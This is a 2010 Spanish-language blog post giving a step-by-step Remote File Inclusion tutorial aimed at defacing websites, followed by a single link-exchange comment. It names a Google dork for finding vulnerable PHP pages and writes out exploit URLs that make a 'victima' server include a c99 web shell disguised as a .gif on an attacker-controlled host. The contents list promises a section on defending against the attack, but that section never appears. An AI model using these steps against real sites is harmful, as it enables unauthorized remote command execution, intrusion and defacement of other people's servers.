lunes, 22 de noviembre de 2010

Tutorial RFI ( Defacing )


***********
RFI
***********

1- Que es RFI?
2- Que es una SHELL?
3- Como encontrar una web vulnerable?
4- Como explotar la vulnerabilidad?
5- Dejando nuesra marca
6- Como evitar que nos lo hagan a nosotros

***************
Que es RFI?
***************

RFI (Remote File Inclusion) es una vulnerabilidad que solamente existe en paginas dinamicas como php que permite enlazar archivos que estan en servidores remotos, esta vulnerabilidad se produce por una mala programacion del webmaster usando la funcion include()
Una web vulnerable podria ser:
www.victima.com/index.php?page=videos.php
Esta pagina lo que esta haciendo es incluir el documento "videos.php".
Nos aprovecharemos de esto incluyendo nuestros propios archivos pero para eso necesitamos una shell.


*********************
Que es una shell?
*********************

Una shell es un interrete de ordenes y comandos. Es una interfaz para comunicar el usuario con el sistema operativo.
Esto para que nos sirve en nuestro deface pensaras? Pues esta claro! Con esto ejecutaremos comandos en la web victima.

**********************************
Como encontrar una web vulnerable?
**********************************

Como encontrar una web vulnerable? Pues con google!
Podemos encontrarlas haciendo busquedas del tipo:
allinurl:index.php?page= .php
y variantes, en vez de page otra cosa similar como: go, pg, ir, ...

************************************
Como explotar la vulnerabilidad?
************************************

Vamos a ver como explotar la vulnerabilidad, tenemos la web
www.victima.com/index.php?page=videos.php
para comprobar que es vulnerable vamos a poner:
page=http://www.zerooo.es (no olvides el http que es muy importante!)
y quedaria algo como...
www.victima.com/index.php?page=http://www.zerooo.es
si ves que nuestra bonita web se carga dentro de esa web, enhorabuena! aunque no siempre esta asegurado el deface...
ahora vamos a meter nuestra shell ahi, hay muchos tipos de shell, yo recomiendo la c99 ya que es muy facil de usar, asi que la descargamos de esta misma web
y si no esta en .gif la ponemos como .gif ya que si estuviera .php se ejecutaria en nuestro servidor.
Ahora la subimos a un hosting gratuito mismo como iespana por ejemplo y vamos a nuestra victima y escribimos donde estaba zerooo la direccion de la shell por ejemplo:
www.victima.com/index.php?page=http://tuweb.com/c99.gif? (Ojo con el ? que a veces es importante)
ahora si todo a salido bien deberia abrirse la shell y ahi veriamos lo que podemos hacer, yo recomiendo NO BORRAR NADA pro bueno yo no voy a decir lo que debeis o no debeis hacer

*************************
deben bajarse una web shell, para poder realizar este ataque, busquen la c99 saludos!

1 comentario:

  1. Hola, me gustaria hacer intercambio de enlaces con tu blog mi contacto es.. probatch@gmail.com

    ResponderEliminar